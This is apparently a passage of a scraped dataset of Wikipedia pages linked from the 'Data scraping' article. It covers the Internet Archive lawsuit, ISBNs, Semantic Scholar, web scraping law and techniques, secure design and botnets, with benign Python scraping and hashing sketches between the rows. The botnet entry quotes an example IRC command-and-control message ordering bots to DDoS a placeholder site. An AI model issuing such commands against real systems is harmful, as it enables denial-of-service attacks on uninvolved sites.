205 The operation of the National Emergency Library was part of a lawsuit filed against the Internet Archive by four major book publishers—Hachette, HarperCollins, John Wiley Sons, and Penguin Random House—in June 2020, challenging the copyright validity of the controlled digital lending program. 4 106 206 In response, the Internet Archive closed the National Emergency Library on June 16, 2020, rather than the planned June 30, 2020, due to the lawsuit. 207 208 The plaintiffs, supported by the Copyright Alliance, 209 claimed in their lawsuit that the Internet Archive's actions constituted a "willful mass copyright infringement". 210 In August 2020 the lawsuit trial was tentatively scheduled to begin in November 2021. 211 By June 2022, both parties to the case requested summary judgment for the case, each favoring their respective sides, which Judge John G. Koeltl approved of a summary judgment hearing to take place later in 2022. 212 No summary judgment was issued, and instead a first hearing was held on March 20, 2023. 213 Over the course of the hearing, Judge John G. Koeltl appeared unmoved by the IA's fair use claims and unconvinced that the publishers' market for library e-books was not impacted by their practice. 214 Senator Thom Tillis of North Carolina, chairman of the intellectual property subcommittee on the Senate Judiciary Committee, said in a letter to the Internet Archive that he was "concerned that the Internet Archive thinks that it—not Congress—gets to determine the scope of copyright law". 210 As part of its response to the publishers' lawsuit, in late 2020 the Archive launched a campaign called Empowering Libraries (hashtag EmpoweringLibraries) that portrayed the lawsuit as a threat to all libraries. 215 In a 2021 preprint article, Argyri Panezi argued that the case "presents two important, but separate questions related to the electronic access to library works; first, it raises questions around the legal practice of digital lending, and second, it asks whether emergency use of copyrighted material might be fair use" and argued that libraries have a public service role to enable "future generations to keep having equal access—or opportunities to access—a plurality of original sources". 216 In December 2020, Publishers Weekly included the lawsuit among its "Top 10 Library Stories of 2020". 217 Judge Koeltl ruled on March 24, 2023, against Internet Archive in the case, saying the National Emergency Library concept was not fair use, so the Archive infringed their copyrights by lending out the books without the waitlist restriction. An agreement was then reached for the Internet Archive to pay an undisclosed amount to the publishers. 218 The Internet Archive said afterwards it would appeal this ruling, but otherwise would continue other digital book services which have been previously cleared under case law, such as books for reading-impaired users. 219 220 An updated report of the appeal process involving the Internet Archive was published on December 18, 2023, by TorrentFreak News. 221 While the Archive has appealed the ruling, it has also removed more than 500,000 books from these publishers to comply with the ruling. 222 |
643 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:BookSources/978-1-5386-8260-9 | This page allows users to search multiple sources for a book given a 10 or 13 digit International Standard Book Number. Spaces and dashes in the ISBN do not matter. This page links to catalogs of libraries, booksellers, and other book sources where you will be able to search for the book by its International Standard Book Number (ISBN). Google Books and Amazon.com may be helpful if you want to verify citations in Wikipedia articles, because they often let you search an online version of the book for specific words or phrases, or you can browse through the book (although for copyright reasons the entire book is usually not available). At the Open Library (part of the Internet Archive) you can borrow and read entire books online. Alabama California Colorado Connecticut Delaware Florida Georgia Illinois Indiana Iowa Kansas Kentucky Massachusetts Michigan Minnesota Missouri Nebraska New Jersey New Mexico New York North Carolina Ohio Oklahoma Oregon Pennsylvania Rhode Island South Carolina South Dakota Tennessee Texas Utah Washington state Wisconsin Find your book on a site that compiles results from other online sites: These sites allow you to search the catalogs of many individual booksellers: If the book you are looking for is in a language other than English, you might find it helpful to look at the equivalent pages on other Wikipedias, linked below they are more likely to have sources appropriate for that language. The WorldCat xISBN tool for finding other editions is no longer available. However, there is often a "view all editions" link on the results page from an ISBN search. Google books often lists other editions of a book and related books under the "about this book" link. You can convert between 10 and 13 digit ISBNs with these tools: Get free access to research Research tools and services Outreach Get involved |
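The page above notes that you can convert between 10- and 13-digit ISBNs with online tools. As a minimal sketch of what such a converter does (the function name and the sample ISBN-10 are illustrative assumptions, not part of the scraped page), the standard conversion prefixes 978, drops the old check digit, and recomputes a new check digit with alternating weights of 1 and 3:

def isbn10_to_isbn13(isbn10):
    # Strip hyphens/spaces, keep the first nine digits, and discard the old check digit.
    chars = [c for c in isbn10 if c not in "- "]
    if len(chars) != 10:
        raise ValueError("expected a 10-character ISBN")
    core = "978" + "".join(chars[:9])
    # ISBN-13 check digit: weights alternate 1, 3, 1, 3, ... over the first 12 digits.
    total = sum(int(d) * (1 if i % 2 == 0 else 3) for i, d in enumerate(core))
    return core + str((10 - total % 10) % 10)

print(isbn10_to_isbn13("1-5386-8260-5"))  # prints 9781538682609, the ISBN-13 in the URL above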
645 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/S2CID_(identifier) | Semantic Scholar is a research tool for scientific literature powered by artificial intelligence. It is developed at the Allen Institute for AI and was publicly released in November 2015. 2 Semantic Scholar uses modern techniques in natural language processing to support the research process, for example by providing automatically generated summaries of scholarly papers. 3 The Semantic Scholar team is actively researching the use of artificial intelligence in natural language processing, machine learning, human-computer interaction, and information retrieval. 4 Semantic Scholar began as a database for the topics of computer science, geoscience, and neuroscience. 5 In 2017, the system began including biomedical literature in its corpus. 5 As of September 2022, it includes over 200 million publications from all fields of science. 6 Semantic Scholar provides a one-sentence summary of scientific literature. One of its aims was to address the challenge of reading numerous titles and lengthy abstracts on mobile devices. 7 It also seeks to ensure that the three million scientific papers published yearly reach readers, since it is estimated that only half of this literature is ever read. 8 Artificial intelligence is used to capture the essence of a paper, generating it through an "abstractive" technique. 3 The project uses a combination of machine learning, natural language processing, and machine vision to add a layer of semantic analysis to the traditional methods of citation analysis, and to extract relevant figures, tables, entities, and venues from papers. 9 10 Another key AI-powered feature is Research Feeds, an adaptive research recommender that uses AI to quickly learn what papers users care about reading and recommends the latest research to help scholars stay up to date. It uses a state-of-the-art paper embedding model trained using contrastive learning to find papers similar to those in each Library folder. 11 Semantic Scholar also offers Semantic Reader, an augmented reader with the potential to revolutionize scientific reading by making it more accessible and richly contextual. 12 Semantic Reader provides in-line citation cards that allow users to see citations with TLDR summaries as they read and skimming highlights that capture key points of a paper so users can digest faster. In contrast with Google Scholar and PubMed, Semantic Scholar is designed to highlight the most important and influential elements of a paper. 13 The AI technology is designed to identify hidden connections and links between research topics. 14 Like the previously cited search engines, Semantic Scholar also exploits graph structures, which include the Microsoft Academic Knowledge Graph, Springer Nature's SciGraph, and the Semantic Scholar Corpus (originally a 45 million papers corpus in computer science, neuroscience and biomedicine). 15 16 Each paper hosted by Semantic Scholar is assigned a unique identifier called the Semantic Scholar Corpus ID (abbreviated S2CID). The following entry is an example: Liu, Ying; Gayle, Albert A; Wilder-Smith, Annelies; Rocklöv, Joacim (March 2020). "The reproductive number of COVID-19 is higher compared to SARS coronavirus". Journal of Travel Medicine. 27 (2). doi:10.1093/jtm/taaa021. PMID 32052846. S2CID 211099356. Semantic Scholar is free to use and unlike similar search engines (i.e. Google Scholar) does not search for material that is behind a paywall. 
5 One study compared the index scope of Semantic Scholar to Google Scholar, and found that for the papers cited by secondary studies in computer science, the two indices had comparable coverage, each only missing a handful of the papers. 17 As of January 2018, following a 2017 project that added biomedical papers and topic summaries, the Semantic Scholar corpus included more than 40 million papers from computer science and biomedicine. 18 In March 2018, Doug Raymond, who developed machine learning initiatives for the Amazon Alexa platform, was hired to lead the Semantic Scholar project. 19 As of August 2019, the number of included paper records (metadata only, not the actual PDFs) had grown to more than 173 million 20 after the addition of the Microsoft Academic Graph records. 21 In 2020, a partnership between Semantic Scholar and the University of Chicago Press Journals made all articles published under the University of Chicago Press available in the Semantic Scholar corpus. 22 At the end of 2020, Semantic Scholar had indexed 190 million papers. 23 In 2020, Semantic Scholar reached seven million users per month. 7 |
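Since the row above explains that every paper in Semantic Scholar carries an S2CID, a small hedged sketch of resolving such an ID programmatically may be useful. It assumes the publicly documented Semantic Scholar Graph API endpoint, the CorpusId: prefix, and the title/year/externalIds field names; none of these appear in the scraped text and they may change.

import requests

def lookup_s2cid(corpus_id, timeout=10):
    # Assumed endpoint of the public Semantic Scholar Graph API; no API key is
    # required for light use, but heavy automated use should respect its rate limits.
    url = f"https://api.semanticscholar.org/graph/v1/paper/CorpusId:{corpus_id}"
    resp = requests.get(url, params={"fields": "title,year,externalIds"}, timeout=timeout)
    resp.raise_for_status()
    return resp.json()

# Example: the COVID-19 reproductive-number paper cited above (S2CID 211099356).
# print(lookup_s2cid(211099356)["title"])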
646 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Techniques | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
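The fetch-then-extract split described above maps directly onto the libraries this notebook already imports (requests, BeautifulSoup, pandas). The sketch below is illustrative only: the URL is a placeholder and the page layout it assumes (a list of links worth tabulating) is hypothetical.

import requests
from bs4 import BeautifulSoup
import pandas as pd

url = "https://example.com/listing"  # placeholder target

# Fetching: download the page, exactly as a browser would.
html = requests.get(url, timeout=10).text

# Extraction: parse the markup and copy out the parts we care about.
soup = BeautifulSoup(html, "html5lib")
records = [{"text": a.get_text(strip=True), "href": a.get("href")}
           for a in soup.find_all("a", href=True)]

# Load the extracted data into a tabular structure for later retrieval or analysis.
df = pd.DataFrame(records)
print(df.head())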
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
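As a minimal illustration of the grep/regular-expression approach described above (the URL and the price pattern are assumptions for the sketch, not something taken from the scraped article), Python's built-in re module can pull matching snippets straight out of fetched HTML without building a DOM tree:

import re
import requests

html = requests.get("https://example.com/prices", timeout=10).text  # placeholder URL

# A simple pattern for dollar amounts such as $1,299.99; real pages usually
# need more robust parsing, e.g. XPath over a DOM tree as described above.
price_pattern = re.compile(r"\$\d{1,3}(?:,\d{3})*(?:\.\d{2})?")
prices = price_pattern.findall(html)
print(prices[:10])

For more structured pages, the XPath approach mentioned above (for example via the lxml library) is usually more robust than raw regular expressions.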
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
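The specific anti-bot techniques were not captured in the scraped text above; commonly cited measures include robots.txt rules, request-rate limits, IP blocking, and CAPTCHAs. A small sketch of the client side, honoring robots.txt with the standard library and throttling requests, is shown below; the user-agent string and crawl delay are arbitrary choices for illustration.

import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

USER_AGENT = "polite-scraper/0.1"   # illustrative user-agent string
CRAWL_DELAY = 5                     # seconds between requests, an arbitrary choice

def polite_get(base_url, path):
    robots = RobotFileParser()
    robots.set_url(urljoin(base_url, "/robots.txt"))
    robots.read()
    url = urljoin(base_url, path)
    if not robots.can_fetch(USER_AGENT, url):
        return None                 # the site disallows this path for bots
    time.sleep(CRAWL_DELAY)         # crude client-side rate limiting
    return requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10).text

# page = polite_get("https://example.com", "/catalogue/")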
647 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Display_device | A display device is an output device for presentation of information in visual 1 or tactile form (the latter used for example in tactile electronic displays for blind people). 2 When the input information that is supplied has an electrical signal the display is called an electronic display. Common applications for electronic visual displays are television sets or computer monitors. These are the technologies used to create the various displays in use today. Some displays can show only digits or alphanumeric characters. They are called segment displays, because they are composed of several segments that switch on and off to give appearance of desired glyph. The segments are usually single LEDs or liquid crystals. They are mostly used in digital watches and pocket calculators. Common types are seven-segment displays which are used for numerals only, and alphanumeric fourteen-segment displays and sixteen-segment displays which can display numerals and Roman alphabet letters. Cathode-ray tubes were also formerly widely used. 2 dimensional displays that cover a full area (usually a rectangle) are also called video displays, since it is the main modality of presenting video. Full-area 2 dimensional displays are used in, for example: Underlying technologies for full-area 2 dimensional displays include: The multiplexed display technique is used to drive most display devices. |
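The passage above describes segment displays as glyphs formed by switching individual segments on and off. A small sketch makes that concrete; the segment names a through g follow the usual seven-segment convention, and the ASCII rendering is purely illustrative.

# Conventional seven-segment encodings: a=top, b=top-right, c=bottom-right,
# d=bottom, e=bottom-left, f=top-left, g=middle.
SEGMENTS = {
    "0": "abcdef", "1": "bc",     "2": "abdeg",  "3": "abcdg",   "4": "bcfg",
    "5": "acdfg",  "6": "acdefg", "7": "abc",    "8": "abcdefg", "9": "abcdfg",
}

def render(digit):
    s = SEGMENTS[digit]
    top = " _ " if "a" in s else "   "
    mid = ("|" if "f" in s else " ") + ("_" if "g" in s else " ") + ("|" if "b" in s else " ")
    low = ("|" if "e" in s else " ") + ("_" if "d" in s else " ") + ("|" if "c" in s else " ")
    return "\n".join((top, mid, low))

print(render("2"))   # lights segments a, b, g, e, d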
648 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Secure_by_design | Secure by design, in software engineering, means that software products and capabilities have been designed to be foundationally secure. Alternate security strategies, tactics and patterns are considered at the beginning of a software design, and the best are selected and enforced by the architecture, and they are used as guiding principles for developers. 1 It is also encouraged to use strategic design patterns that have beneficial effects on security, even though those design patterns were not originally devised with security in mind. 2 Secure by Design is increasingly becoming the mainstream development approach to ensure security and privacy of software systems. In this approach, security is considered and built into the system at every layer and starts with a robust architecture design. Security architectural design decisions are based on well-known security strategies, tactics, and patterns defined as reusable techniques for achieving specific quality concerns. Security tactics patterns provide solutions for enforcing the necessary authentication, authorization, confidentiality, data integrity, privacy, accountability, availability, safety and non-repudiation requirements, even when the system is under attack. 3 In order to ensure the security of a software system, not only is it important to design a robust intended security architecture but it is also necessary to map updated security strategies, tactics and patterns to software development in order to maintain security persistence. Malicious attacks on software should be assumed to occur, and care is taken to minimize impact. Security vulnerabilities are anticipated, along with invalid user input. 4 Closely related is the practice of using "good" software design, such as domain-driven design or cloud native, as a way to increase security by reducing risk of vulnerability-opening mistakes—even though the design principles used were not originally conceived for security purposes. Generally, designs that work well do not rely on being secret. Often, secrecy reduces the number of attackers by demotivating a subset of the threat population. The logic is that if there is an increase in complexity for the attacker, the increased attacker effort to compromise the target will discourage them. While this technique implies reduced inherent risks, a virtually infinite set of threat actors and techniques applied over time will cause most secrecy methods to fail. While not mandatory, proper security usually means that everyone is allowed to know and understand the design because it is secure. This has the advantage that many people are looking at the source code, which improves the odds that any flaws will be found sooner (see Linus's law). The disadvantage is that attackers can also obtain the code, which makes it easier for them to find vulnerabilities to exploit. It is generally believed, though, that the advantage of the open source code outweighs the disadvantage. Also, it is important that everything works with the fewest privileges possible (see the principle of least privilege). For example, a web server that runs as the administrative user ("root" or "admin") can have the privilege to remove files and users. 
A flaw in such a program could therefore put the entire system at risk, whereas a web server that runs inside an isolated environment, and only has the privileges for required network and filesystem functions, cannot compromise the system it runs on unless the security around it in itself is also flawed. Secure Design should be a consideration at all points in the development lifecycle (whichever development methodology is chosen). Some pre-built Secure By Design development methodologies exist (e.g. Microsoft Security Development Lifecycle). Standards and Legislation exist to aide secure design by controlling the definition of "Secure", and providing concrete steps to testing and integrating secure systems. Some examples of standards which cover or touch on Secure By Design principles: In server client architectures, the program at the other side may not be an authorised client and the client's server may not be an authorised server. Even when they are, a man-in-the-middle attack could compromise communications. Often the easiest way to break the security of a client server system is not to go head on to the security mechanisms, but instead to go around them. A man in the middle attack is a simple example of this, because you can use it to collect details to impersonate a user. Which is why it is important to consider encryption, hashing, and other security mechanisms in your design to ensure that information collected from a potential attacker won't allow access. Another key feature to client-server security design is good coding practices. For example, following a known software design structure, such as client and broker, can help in designing a well-built structure with a solid foundation. Furthermore, if the software is to be modified in the future, it is even more important that it follows a logical foundation of separation between the client and server. This is because if a programmer comes in and cannot clearly understand the dynamics of the program, they may end up adding or changing something that can add a security flaw. Even with the best design, this is always a possibility, but the better the standardization of the design, the less chance there is of this occurring. |
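To make the point above about designing hashing into a client-server system concrete, here is a minimal sketch using only the standard library; the iteration count and salt size are illustrative choices, and a production design would normally reach for a vetted password-hashing library instead.

import hashlib
import hmac
import os

def hash_password(password, salt=None):
    # A fresh random salt per password defeats precomputed (rainbow-table) attacks.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_password(password, salt, expected):
    _, digest = hash_password(password, salt)
    # Constant-time comparison avoids leaking information through response timing.
    return hmac.compare_digest(digest, expected)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True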
649 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Botnet | A botnet is a group of Internet-connected devices, each of which runs one or more bots. Botnets can be used to perform distributed denial-of-service (DDoS) attacks, steal data, 1 send spam, and allow the attacker to access the device and its connection. The owner can control the botnet using command and control (C C) software. 2 The word "botnet" is a portmanteau of the words "robot" and "network". The term is usually used with a negative or malicious connotation. A botnet is a logical collection of Internet-connected devices, such as computers, smartphones or Internet of things (IoT) devices whose security have been breached and control ceded to a third party. Each compromised device, known as a "bot, is created when a device is penetrated by software from a malware (malicious software) distribution. The controller of a botnet is able to direct the activities of these compromised computers through communication channels formed by standards-based network protocols, such as IRC and Hypertext Transfer Protocol (HTTP). 3 4 Botnets are increasingly rented out by cyber criminals as commodities for a variety of purposes, 5 including as booter stresser services. Botnet architecture has evolved over time in an effort to evade detection and disruption. Traditionally, bot programs are constructed as clients which communicate via existing servers. This allows the bot herder (the controller of the botnet) to perform all control from a remote location, which obfuscates the traffic. 6 Many recent botnets now rely on existing peer-to-peer networks to communicate. These P2P bot programs perform the same actions as the client server model, but they do not require a central server to communicate. The first botnets on the Internet used a client server model to accomplish their tasks. 7 Typically, these botnets operate through Internet Relay Chat networks, domains, or websites. Infected clients access a predetermined location and await incoming commands from the server. The bot herder sends commands to the server, which relays them to the clients. Clients execute the commands and report their results back to the bot herder. In the case of IRC botnets, infected clients connect to an infected IRC server and join a channel pre-designated for C C by the bot herder. The bot herder sends commands to the channel via the IRC server. Each client retrieves the commands and executes them. Clients send messages back to the IRC channel with the results of their actions. 6 In response to efforts to detect and decapitate IRC botnets, bot herders have begun deploying malware on peer-to-peer networks. These bots may use digital signatures so that only someone with access to the private key can control the botnet, 8 such as in Gameover ZeuS and the ZeroAccess botnet. Newer botnets fully operate over P2P networks. Rather than communicate with a centralized server, P2P bots perform as both a command distribution server and a client which receives commands. 9 This avoids having any single point of failure, which is an issue for centralized botnets. In order to find other infected machines, P2P bots discreetly probe random IP addresses until they identify another infected machine. The contacted bot replies with information such as its software version and list of known bots. If one of the bots' version is lower than the other, they will initiate a file transfer to update. 
8 This way, each bot grows its list of infected machines and updates itself by periodically communicating to all known bots. A botnet's originator (known as a "bot herder" or "bot master") controls the botnet remotely. This is known as the command-and-control (C C). The program for the operation must communicate via a covert channel to the client on the victim's machine (zombie computer). IRC is a historically favored means of C C because of its communication protocol. A bot herder creates an IRC channel for infected clients to join. Messages sent to the channel are broadcast to all channel members. The bot herder may set the channel's topic to command the botnet. For example, the message :herder herder example.com TOPIC channel DDoS www.victim.com from the bot herder alerts all infected clients belonging to channel to begin a DDoS attack on the website www.victim.com. An example response :bot1 bot1 compromised.net PRIVMSG channel I am DDoSing www.victim.com by a bot client alerts the bot herder that it has begun the attack. 8 Some botnets implement custom versions of well-known protocols. The implementation differences can be used for detection of botnets. For example, Mega-D features a slightly modified Simple Mail Transfer Protocol (SMTP) implementation for testing spam capability. Bringing down the Mega-D's SMTP server disables the entire pool of bots that rely upon the same SMTP server. 10 In computer science, a zombie computer is a computer 